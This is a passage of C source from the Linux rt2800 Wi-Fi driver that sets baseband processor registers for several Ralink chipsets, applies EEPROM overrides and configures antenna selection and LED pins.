	return -EACCES;
}
/*
 * rt2800_bbp4_mac_if_ctrl - set the MAC_IF_CTRL bit in BBP register 4.
 *
 * Read-modify-write so the other bits of BBP 4 are preserved.
 */
static void rt2800_bbp4_mac_if_ctrl(struct rt2x00_dev *rt2x00dev)
{
	u8 bbp4;

	rt2800_bbp_read(rt2x00dev, 4, &bbp4);
	rt2x00_set_field8(&bbp4, BBP4_MAC_IF_CTRL, 1);
	rt2800_bbp_write(rt2x00dev, 4, bbp4);
}
/*
 * rt2800_init_freq_calibration - write the frequency calibration BBP pair.
 *
 * NOTE(review): writes 1/57 to BBP registers 142/143; presumably this
 * selects and seeds the frequency-calibration machinery per the vendor
 * driver — confirm against the RT2800 BBP documentation.
 */
static void rt2800_init_freq_calibration(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 142, 1);
	rt2800_bbp_write(rt2x00dev, 143, 57);
}
/*
 * rt2800_init_bbp_5592_glrt - load the RT5592 GLRT coefficient table.
 *
 * Extended BBP registers 128..211 are programmed indirectly: BBP 195
 * selects the target register, BBP 196 carries the value.
 *
 * Fixes: stray ';' after the function's closing brace, the coefficient
 * table rebuilt on the stack on every call (now 'static const'), and
 * inconsistent '0X' hex prefixes.
 */
static void rt2800_init_bbp_5592_glrt(struct rt2x00_dev *rt2x00dev)
{
	static const u8 glrt_table[] = {
		0xE0, 0x1F, 0x38, 0x32, 0x08, 0x28, 0x19, 0x0A, 0xFF, 0x00, /* 128 ~ 137 */
		0x16, 0x10, 0x10, 0x0B, 0x36, 0x2C, 0x26, 0x24, 0x42, 0x36, /* 138 ~ 147 */
		0x30, 0x2D, 0x4C, 0x46, 0x3D, 0x40, 0x3E, 0x42, 0x3D, 0x40, /* 148 ~ 157 */
		0x3C, 0x34, 0x2C, 0x2F, 0x3C, 0x35, 0x2E, 0x2A, 0x49, 0x41, /* 158 ~ 167 */
		0x36, 0x31, 0x30, 0x30, 0x0E, 0x0D, 0x28, 0x21, 0x1C, 0x16, /* 168 ~ 177 */
		0x50, 0x4A, 0x43, 0x40, 0x10, 0x10, 0x10, 0x10, 0x00, 0x00, /* 178 ~ 187 */
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 188 ~ 197 */
		0x00, 0x00, 0x7D, 0x14, 0x32, 0x2C, 0x36, 0x4C, 0x43, 0x2C, /* 198 ~ 207 */
		0x2E, 0x36, 0x30, 0x6E, /* 208 ~ 211 */
	};
	int i;

	for (i = 0; i < ARRAY_SIZE(glrt_table); i++) {
		rt2800_bbp_write(rt2x00dev, 195, 128 + i);
		rt2800_bbp_write(rt2x00dev, 196, glrt_table[i]);
	}
}
static void rt2800_init_bbp_early(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 65, 0x2C);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 68, 0x0B);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 81, 0x37);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6A);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
rt2800_bbp_write(rt2x00dev, 103, 0x00);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
/*
 * rt2800_disable_unused_dac_adc - trim BBP 138 for single-path devices.
 *
 * Reads the TX/RX path counts from EEPROM_NIC_CONF0 and adjusts BBP
 * register 138 when only one path is present: sets 0x20 for a single TX
 * path, clears 0x02 for a single RX path.
 * NOTE(review): the exact DAC/ADC meaning of these two bits is taken on
 * trust from the vendor driver — confirm against the BBP documentation.
 */
static void rt2800_disable_unused_dac_adc(struct rt2x00_dev *rt2x00dev)
{
	u16 eeprom;
	u8 value;

	rt2800_bbp_read(rt2x00dev, 138, &value);
	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
		value |= 0x20;
	if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
		value &= ~0x02;
	rt2800_bbp_write(rt2x00dev, 138, value);
}
/*
 * rt2800_init_bbp_305x_soc - BBP initialization for RT305x SoC devices.
 *
 * Plain sequence of vendor-default register writes; the write order is
 * kept as-is since hardware init sequences can be order sensitive.
 */
static void rt2800_init_bbp_305x_soc(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 31, 0x08);
	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);
	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x10);
	rt2800_bbp_write(rt2x00dev, 70, 0x0a);
	rt2800_bbp_write(rt2x00dev, 78, 0x0e);
	rt2800_bbp_write(rt2x00dev, 80, 0x08);
	rt2800_bbp_write(rt2x00dev, 82, 0x62);
	rt2800_bbp_write(rt2x00dev, 83, 0x6a);
	rt2800_bbp_write(rt2x00dev, 84, 0x99);
	rt2800_bbp_write(rt2x00dev, 86, 0x00);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x00);
	rt2800_bbp_write(rt2x00dev, 103, 0xc0);
	rt2800_bbp_write(rt2x00dev, 105, 0x01);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
/*
 * rt2800_init_bbp_28xx - BBP initialization for the RT28xx generation.
 *
 * Vendor-default register writes; early RT2860 revisions (C and D) need
 * different values for BBP 69/73 and BBP 84 respectively.
 */
static void rt2800_init_bbp_28xx(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	/* Revision-specific values for RT2860C silicon */
	if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C)) {
		rt2800_bbp_write(rt2x00dev, 69, 0x16);
		rt2800_bbp_write(rt2x00dev, 73, 0x12);
	} else {
		rt2800_bbp_write(rt2x00dev, 69, 0x12);
		rt2800_bbp_write(rt2x00dev, 73, 0x10);
	}

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 81, 0x37);
	rt2800_bbp_write(rt2x00dev, 82, 0x62);
	rt2800_bbp_write(rt2x00dev, 83, 0x6a);

	/* Revision-specific value for RT2860D silicon */
	if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860D))
		rt2800_bbp_write(rt2x00dev, 84, 0x19);
	else
		rt2800_bbp_write(rt2x00dev, 84, 0x99);

	rt2800_bbp_write(rt2x00dev, 86, 0x00);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x00);
	rt2800_bbp_write(rt2x00dev, 103, 0x00);
	rt2800_bbp_write(rt2x00dev, 105, 0x05);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
/*
 * rt2800_init_bbp_30xx - BBP initialization for RT3070/RT3071/RT3090.
 *
 * Vendor-default register writes. BBP 103 depends on the silicon
 * revision, and RT3071/RT3090 additionally disable the unused DAC/ADC
 * paths based on the EEPROM path counts.
 */
static void rt2800_init_bbp_30xx(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x10);

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 79, 0x13);
	rt2800_bbp_write(rt2x00dev, 80, 0x05);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);

	rt2800_bbp_write(rt2x00dev, 82, 0x62);

	rt2800_bbp_write(rt2x00dev, 83, 0x6a);

	rt2800_bbp_write(rt2x00dev, 84, 0x99);

	rt2800_bbp_write(rt2x00dev, 86, 0x00);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x00);

	/* Newer silicon revisions use a different BBP 103 value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT3070, REV_RT3070F) ||
	    rt2x00_rt_rev_gte(rt2x00dev, RT3071, REV_RT3071E) ||
	    rt2x00_rt_rev_gte(rt2x00dev, RT3090, REV_RT3090E))
		rt2800_bbp_write(rt2x00dev, 103, 0xc0);
	else
		rt2800_bbp_write(rt2x00dev, 103, 0x00);

	rt2800_bbp_write(rt2x00dev, 105, 0x05);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);

	if (rt2x00_rt(rt2x00dev, RT3071) ||
	    rt2x00_rt(rt2x00dev, RT3090))
		rt2800_disable_unused_dac_adc(rt2x00dev);
}
/*
 * rt2800_init_bbp_3290 - BBP initialization for the RT3290.
 *
 * Vendor-default register writes, followed by enabling TSSI via ADC6
 * (BBP 47) and switching the ADC mode bits in BBP 3.
 */
static void rt2800_init_bbp_3290(struct rt2x00_dev *rt2x00dev)
{
	u8 value;

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 31, 0x08);

	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	rt2800_bbp_write(rt2x00dev, 68, 0x0b);

	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x13);
	rt2800_bbp_write(rt2x00dev, 75, 0x46);
	rt2800_bbp_write(rt2x00dev, 76, 0x28);

	rt2800_bbp_write(rt2x00dev, 77, 0x58);

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 74, 0x0b);
	rt2800_bbp_write(rt2x00dev, 79, 0x18);
	rt2800_bbp_write(rt2x00dev, 80, 0x09);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);

	rt2800_bbp_write(rt2x00dev, 82, 0x62);

	rt2800_bbp_write(rt2x00dev, 83, 0x7a);

	rt2800_bbp_write(rt2x00dev, 84, 0x9a);

	rt2800_bbp_write(rt2x00dev, 86, 0x38);

	rt2800_bbp_write(rt2x00dev, 91, 0x04);

	rt2800_bbp_write(rt2x00dev, 92, 0x02);

	rt2800_bbp_write(rt2x00dev, 103, 0xc0);

	rt2800_bbp_write(rt2x00dev, 104, 0x92);

	rt2800_bbp_write(rt2x00dev, 105, 0x1c);

	rt2800_bbp_write(rt2x00dev, 106, 0x03);

	rt2800_bbp_write(rt2x00dev, 128, 0x12);

	rt2800_bbp_write(rt2x00dev, 67, 0x24);
	rt2800_bbp_write(rt2x00dev, 143, 0x04);
	rt2800_bbp_write(rt2x00dev, 142, 0x99);
	rt2800_bbp_write(rt2x00dev, 150, 0x30);
	rt2800_bbp_write(rt2x00dev, 151, 0x2e);
	rt2800_bbp_write(rt2x00dev, 152, 0x20);
	rt2800_bbp_write(rt2x00dev, 153, 0x34);
	rt2800_bbp_write(rt2x00dev, 154, 0x40);
	rt2800_bbp_write(rt2x00dev, 155, 0x3b);
	rt2800_bbp_write(rt2x00dev, 253, 0x04);

	/* Route TSSI measurement through ADC6 */
	rt2800_bbp_read(rt2x00dev, 47, &value);
	rt2x00_set_field8(&value, BBP47_TSSI_ADC6, 1);
	rt2800_bbp_write(rt2x00dev, 47, value);

	/* Use 5-bit ADC for Acquisition and 8-bit ADC for data */
	rt2800_bbp_read(rt2x00dev, 3, &value);
	rt2x00_set_field8(&value, BBP3_ADC_MODE_SWITCH, 1);
	rt2x00_set_field8(&value, BBP3_ADC_INIT_MODE, 1);
	rt2800_bbp_write(rt2x00dev, 3, value);
}
/*
 * rt2800_init_bbp_3352 - BBP initialization for the RT3352.
 *
 * Vendor-default register writes, plus the indirect BBP 179/180/182
 * sequence that programs the ITxBF timeout, and the BBP 142/143 pairs
 * that reprogram the inband interface for correct RXWI contents.
 */
static void rt2800_init_bbp_3352(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 3, 0x00);
	rt2800_bbp_write(rt2x00dev, 4, 0x50);

	rt2800_bbp_write(rt2x00dev, 31, 0x08);

	rt2800_bbp_write(rt2x00dev, 47, 0x48);

	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	rt2800_bbp_write(rt2x00dev, 68, 0x0b);

	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x13);
	rt2800_bbp_write(rt2x00dev, 75, 0x46);
	rt2800_bbp_write(rt2x00dev, 76, 0x28);

	rt2800_bbp_write(rt2x00dev, 77, 0x59);

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 78, 0x0e);
	rt2800_bbp_write(rt2x00dev, 80, 0x08);
	rt2800_bbp_write(rt2x00dev, 81, 0x37);

	rt2800_bbp_write(rt2x00dev, 82, 0x62);

	rt2800_bbp_write(rt2x00dev, 83, 0x6a);

	rt2800_bbp_write(rt2x00dev, 84, 0x99);

	rt2800_bbp_write(rt2x00dev, 86, 0x38);

	rt2800_bbp_write(rt2x00dev, 88, 0x90);

	rt2800_bbp_write(rt2x00dev, 91, 0x04);

	rt2800_bbp_write(rt2x00dev, 92, 0x02);

	rt2800_bbp_write(rt2x00dev, 103, 0xc0);

	rt2800_bbp_write(rt2x00dev, 104, 0x92);

	rt2800_bbp_write(rt2x00dev, 105, 0x34);

	rt2800_bbp_write(rt2x00dev, 106, 0x05);

	rt2800_bbp_write(rt2x00dev, 120, 0x50);

	rt2800_bbp_write(rt2x00dev, 137, 0x0f);

	rt2800_bbp_write(rt2x00dev, 163, 0xbd);
	/* Set ITxBF timeout to 0x9c40=1000msec */
	rt2800_bbp_write(rt2x00dev, 179, 0x02);
	rt2800_bbp_write(rt2x00dev, 180, 0x00);
	rt2800_bbp_write(rt2x00dev, 182, 0x40);
	rt2800_bbp_write(rt2x00dev, 180, 0x01);
	rt2800_bbp_write(rt2x00dev, 182, 0x9c);
	rt2800_bbp_write(rt2x00dev, 179, 0x00);
	/* Reprogram the inband interface to put right values in RXWI */
	rt2800_bbp_write(rt2x00dev, 142, 0x04);
	rt2800_bbp_write(rt2x00dev, 143, 0x3b);
	rt2800_bbp_write(rt2x00dev, 142, 0x06);
	rt2800_bbp_write(rt2x00dev, 143, 0xa0);
	rt2800_bbp_write(rt2x00dev, 142, 0x07);
	rt2800_bbp_write(rt2x00dev, 143, 0xa1);
	rt2800_bbp_write(rt2x00dev, 142, 0x08);
	rt2800_bbp_write(rt2x00dev, 143, 0xa2);

	rt2800_bbp_write(rt2x00dev, 148, 0xc8);
}
/*
 * rt2800_init_bbp_3390 - BBP initialization for the RT3390.
 *
 * Vendor-default register writes; BBP 103 depends on the silicon
 * revision, and the unused DAC/ADC paths are disabled afterwards.
 */
static void rt2800_init_bbp_3390(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x10);

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 79, 0x13);
	rt2800_bbp_write(rt2x00dev, 80, 0x05);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);

	rt2800_bbp_write(rt2x00dev, 82, 0x62);

	rt2800_bbp_write(rt2x00dev, 83, 0x6a);

	rt2800_bbp_write(rt2x00dev, 84, 0x99);

	rt2800_bbp_write(rt2x00dev, 86, 0x00);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x00);

	/* Newer RT3390E silicon uses a different BBP 103 value */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT3390, REV_RT3390E))
		rt2800_bbp_write(rt2x00dev, 103, 0xc0);
	else
		rt2800_bbp_write(rt2x00dev, 103, 0x00);

	rt2800_bbp_write(rt2x00dev, 105, 0x05);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);

	rt2800_disable_unused_dac_adc(rt2x00dev);
}
/*
 * rt2800_init_bbp_3572 - BBP initialization for the RT3572.
 *
 * Vendor-default register writes, followed by disabling the DAC/ADC
 * paths that the EEPROM says are not present.
 */
static void rt2800_init_bbp_3572(struct rt2x00_dev *rt2x00dev)
{
	rt2800_bbp_write(rt2x00dev, 31, 0x08);

	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);

	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x10);

	rt2800_bbp_write(rt2x00dev, 70, 0x0a);

	rt2800_bbp_write(rt2x00dev, 79, 0x13);
	rt2800_bbp_write(rt2x00dev, 80, 0x05);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);

	rt2800_bbp_write(rt2x00dev, 82, 0x62);

	rt2800_bbp_write(rt2x00dev, 83, 0x6a);

	rt2800_bbp_write(rt2x00dev, 84, 0x99);

	rt2800_bbp_write(rt2x00dev, 86, 0x00);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x00);

	rt2800_bbp_write(rt2x00dev, 103, 0xc0);

	rt2800_bbp_write(rt2x00dev, 105, 0x05);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);

	rt2800_disable_unused_dac_adc(rt2x00dev);
}
/*
 * rt2800_init_bbp_3593 - BBP initialization for the RT3593.
 *
 * Starts from the common early defaults, then applies RT3593-specific
 * overrides; the DC filter (BBP 103) is only enabled on RT3593E or later.
 */
static void rt2800_init_bbp_3593(struct rt2x00_dev *rt2x00dev)
{
	rt2800_init_bbp_early(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 79, 0x13);
	rt2800_bbp_write(rt2x00dev, 80, 0x05);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);
	rt2800_bbp_write(rt2x00dev, 137, 0x0f);

	rt2800_bbp_write(rt2x00dev, 84, 0x19);

	/* Enable DC filter */
	if (rt2x00_rt_rev_gte(rt2x00dev, RT3593, REV_RT3593E))
		rt2800_bbp_write(rt2x00dev, 103, 0xc0);
}
/*
 * rt2800_init_bbp_53xx - program the RT5390/RT5392 baseband processor.
 *
 * Applies the vendor-recommended BBP defaults (with a few RT5392-only
 * registers), powers down unused DAC/ADC paths, selects the default RX
 * antenna from the EEPROM diversity setting - driving the antenna
 * selection GPIOs on Bluetooth combo cards - and finally kicks off
 * frequency offset calibration.
 *
 * Fix: restored "&reg" in the GPIO_CTRL register accesses; the source
 * had been mangled into a literal "registered" symbol ("&reg" -> (R)),
 * which does not compile.
 */
static void rt2800_init_bbp_53xx(struct rt2x00_dev *rt2x00dev)
{
	int ant, div_mode;
	u16 eeprom;
	u8 value;

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 31, 0x08);
	rt2800_bbp_write(rt2x00dev, 65, 0x2c);
	rt2800_bbp_write(rt2x00dev, 66, 0x38);
	rt2800_bbp_write(rt2x00dev, 68, 0x0b);
	rt2800_bbp_write(rt2x00dev, 69, 0x12);
	rt2800_bbp_write(rt2x00dev, 73, 0x13);
	rt2800_bbp_write(rt2x00dev, 75, 0x46);
	rt2800_bbp_write(rt2x00dev, 76, 0x28);
	rt2800_bbp_write(rt2x00dev, 77, 0x59);
	rt2800_bbp_write(rt2x00dev, 70, 0x0a);
	rt2800_bbp_write(rt2x00dev, 79, 0x13);
	rt2800_bbp_write(rt2x00dev, 80, 0x05);
	rt2800_bbp_write(rt2x00dev, 81, 0x33);
	rt2800_bbp_write(rt2x00dev, 82, 0x62);
	rt2800_bbp_write(rt2x00dev, 83, 0x7a);
	rt2800_bbp_write(rt2x00dev, 84, 0x9a);
	rt2800_bbp_write(rt2x00dev, 86, 0x38);

	if (rt2x00_rt(rt2x00dev, RT5392))
		rt2800_bbp_write(rt2x00dev, 88, 0x90);

	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x02);

	if (rt2x00_rt(rt2x00dev, RT5392)) {
		rt2800_bbp_write(rt2x00dev, 95, 0x9a);
		rt2800_bbp_write(rt2x00dev, 98, 0x12);
	}

	rt2800_bbp_write(rt2x00dev, 103, 0xc0);
	rt2800_bbp_write(rt2x00dev, 104, 0x92);
	rt2800_bbp_write(rt2x00dev, 105, 0x3c);

	/* BBP 106 value differs between the two supported chips */
	if (rt2x00_rt(rt2x00dev, RT5390))
		rt2800_bbp_write(rt2x00dev, 106, 0x03);
	else if (rt2x00_rt(rt2x00dev, RT5392))
		rt2800_bbp_write(rt2x00dev, 106, 0x12);
	else
		WARN_ON(1);

	rt2800_bbp_write(rt2x00dev, 128, 0x12);

	if (rt2x00_rt(rt2x00dev, RT5392)) {
		rt2800_bbp_write(rt2x00dev, 134, 0xd0);
		rt2800_bbp_write(rt2x00dev, 135, 0xf6);
	}

	rt2800_disable_unused_dac_adc(rt2x00dev);

	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
	div_mode = rt2x00_get_field16(eeprom,
				      EEPROM_NIC_CONF1_ANT_DIVERSITY);
	/* div_mode 3 selects the auxiliary antenna, anything else main */
	ant = (div_mode == 3) ? 1 : 0;

	/* check if this is a Bluetooth combo card */
	if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
		u32 reg;

		rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);
		rt2x00_set_field32(&reg, GPIO_CTRL_DIR3, 0);
		rt2x00_set_field32(&reg, GPIO_CTRL_DIR6, 0);
		rt2x00_set_field32(&reg, GPIO_CTRL_VAL3, 0);
		rt2x00_set_field32(&reg, GPIO_CTRL_VAL6, 0);
		if (ant == 0)
			rt2x00_set_field32(&reg, GPIO_CTRL_VAL3, 1);
		else if (ant == 1)
			rt2x00_set_field32(&reg, GPIO_CTRL_VAL6, 1);
		rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
	}

	/* This chip has hardware antenna diversity*/
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390R)) {
		rt2800_bbp_write(rt2x00dev, 150, 0); /* Disable Antenna Software OFDM */
		rt2800_bbp_write(rt2x00dev, 151, 0); /* Disable Antenna Software CCK */
		rt2800_bbp_write(rt2x00dev, 154, 0); /* Clear previously selected antenna */
	}

	rt2800_bbp_read(rt2x00dev, 152, &value);
	if (ant == 0)
		rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 1);
	else
		rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 0);
	rt2800_bbp_write(rt2x00dev, 152, value);

	rt2800_init_freq_calibration(rt2x00dev);
}
/*
 * rt2800_init_bbp_5592 - program the RT5592 baseband processor.
 *
 * Sequence: common early init, MLD configuration (depends on the number
 * of RX chains), the RT5592 register defaults, the GLRT table, default
 * RX antenna selection from the EEPROM diversity field, and finally
 * frequency offset calibration plus RT5592C+ revision tweaks.
 */
static void rt2800_init_bbp_5592(struct rt2x00_dev *rt2x00dev)
{
	int ant, div_mode;
	u16 eeprom;
	u8 value;

	rt2800_init_bbp_early(rt2x00dev);

	/* Enable MLD only when two RX chains are available */
	rt2800_bbp_read(rt2x00dev, 105, &value);
	rt2x00_set_field8(&value, BBP105_MLD,
			  rt2x00dev->default_ant.rx_chain_num == 2);
	rt2800_bbp_write(rt2x00dev, 105, value);

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 20, 0x06);
	rt2800_bbp_write(rt2x00dev, 31, 0x08);
	rt2800_bbp_write(rt2x00dev, 65, 0x2C);
	rt2800_bbp_write(rt2x00dev, 68, 0xDD);
	rt2800_bbp_write(rt2x00dev, 69, 0x1A);
	rt2800_bbp_write(rt2x00dev, 70, 0x05);
	rt2800_bbp_write(rt2x00dev, 73, 0x13);
	rt2800_bbp_write(rt2x00dev, 74, 0x0F);
	rt2800_bbp_write(rt2x00dev, 75, 0x4F);
	rt2800_bbp_write(rt2x00dev, 76, 0x28);
	rt2800_bbp_write(rt2x00dev, 77, 0x59);
	rt2800_bbp_write(rt2x00dev, 84, 0x9A);
	rt2800_bbp_write(rt2x00dev, 86, 0x38);
	rt2800_bbp_write(rt2x00dev, 88, 0x90);
	rt2800_bbp_write(rt2x00dev, 91, 0x04);
	rt2800_bbp_write(rt2x00dev, 92, 0x02);
	rt2800_bbp_write(rt2x00dev, 95, 0x9a);
	rt2800_bbp_write(rt2x00dev, 98, 0x12);
	rt2800_bbp_write(rt2x00dev, 103, 0xC0);
	rt2800_bbp_write(rt2x00dev, 104, 0x92);
	/* FIXME BBP105 owerwrite */
	rt2800_bbp_write(rt2x00dev, 105, 0x3C);
	rt2800_bbp_write(rt2x00dev, 106, 0x35);
	rt2800_bbp_write(rt2x00dev, 128, 0x12);
	rt2800_bbp_write(rt2x00dev, 134, 0xD0);
	rt2800_bbp_write(rt2x00dev, 135, 0xF6);
	rt2800_bbp_write(rt2x00dev, 137, 0x0F);

	/* Initialize GLRT (Generalized Likehood Radio Test) */
	rt2800_init_bbp_5592_glrt(rt2x00dev);

	rt2800_bbp4_mac_if_ctrl(rt2x00dev);

	rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
	div_mode = rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_ANT_DIVERSITY);
	ant = (div_mode == 3) ? 1 : 0;
	rt2800_bbp_read(rt2x00dev, 152, &value);
	if (ant == 0) {
		/* Main antenna */
		rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 1);
	} else {
		/* Auxiliary antenna */
		rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 0);
	}
	rt2800_bbp_write(rt2x00dev, 152, value);

	if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C)) {
		rt2800_bbp_read(rt2x00dev, 254, &value);
		rt2x00_set_field8(&value, BBP254_BIT7, 1);
		rt2800_bbp_write(rt2x00dev, 254, value);
	}

	rt2800_init_freq_calibration(rt2x00dev);

	rt2800_bbp_write(rt2x00dev, 84, 0x19);
	if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C))
		rt2800_bbp_write(rt2x00dev, 103, 0xc0);
}
/*
 * rt2800_init_bbp - BBP initialization dispatcher.
 *
 * Runs the SoC-specific setup first (305x SoC boards), then the
 * chip-specific BBP init routine.  Afterwards any BBP overrides stored
 * in the EEPROM tweak table are applied.  Note RT3593 and RT5592
 * 'return' instead of 'break', so they deliberately skip the EEPROM
 * override loop below.
 */
static void rt2800_init_bbp(struct rt2x00_dev *rt2x00dev)
{
	unsigned int i;
	u16 eeprom;
	u8 reg_id;
	u8 value;

	if (rt2800_is_305x_soc(rt2x00dev))
		rt2800_init_bbp_305x_soc(rt2x00dev);

	switch (rt2x00dev->chip.rt) {
	case RT2860:
	case RT2872:
	case RT2883:
		rt2800_init_bbp_28xx(rt2x00dev);
		break;
	case RT3070:
	case RT3071:
	case RT3090:
		rt2800_init_bbp_30xx(rt2x00dev);
		break;
	case RT3290:
		rt2800_init_bbp_3290(rt2x00dev);
		break;
	case RT3352:
		rt2800_init_bbp_3352(rt2x00dev);
		break;
	case RT3390:
		rt2800_init_bbp_3390(rt2x00dev);
		break;
	case RT3572:
		rt2800_init_bbp_3572(rt2x00dev);
		break;
	case RT3593:
		rt2800_init_bbp_3593(rt2x00dev);
		return;
	case RT5390:
	case RT5392:
		rt2800_init_bbp_53xx(rt2x00dev);
		break;
	case RT5592:
		rt2800_init_bbp_5592(rt2x00dev);
		return;
	}

	/* Apply per-board BBP overrides from the EEPROM; entries that are
	 * all-ones or all-zeroes mark unused table slots.
	 */
	for (i = 0; i < EEPROM_BBP_SIZE; i++) {
		rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_BBP_START, i,
					      &eeprom);
		if (eeprom != 0xffff && eeprom != 0x0000) {
			reg_id = rt2x00_get_field16(eeprom, EEPROM_BBP_REG_ID);
			value = rt2x00_get_field16(eeprom, EEPROM_BBP_VALUE);
			rt2800_bbp_write(rt2x00dev, reg_id, value);
		}
	}
}
/*
 * rt2800_led_open_drain_enable - put the LED pin into open-drain mode.
 *
 * Sets bit 0 of OPT_14_CSR via read-modify-write.
 *
 * Fix: restored "&reg" in the register accesses; the source had been
 * mangled into a literal (R) symbol, which does not compile.
 */
static void rt2800_led_open_drain_enable(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;

	rt2800_register_read(rt2x00dev, OPT_14_CSR, &reg);
	rt2x00_set_field32(&reg, OPT_14_CSR_BIT0, 1);
	rt2800_register_write(rt2x00dev, OPT_14_CSR, reg);
}
/*
 * rt2800_init_rx_filter - calibrate the RX filter for one bandwidth.
 * @rt2x00dev: device to calibrate
 * @bw40: true to calibrate for 40 MHz channels, false for 20 MHz
 * @filter_target: desired passband/stopband power difference
 *
 * Puts the RF into baseband loopback, injects test tones and widens the
 * filter (RFCSR 24) step by step until the measured passband-stopband
 * difference exceeds @filter_target.  Returns the calibrated RFCSR 24
 * value, backed off by one step if the loop over-tuned.
 */
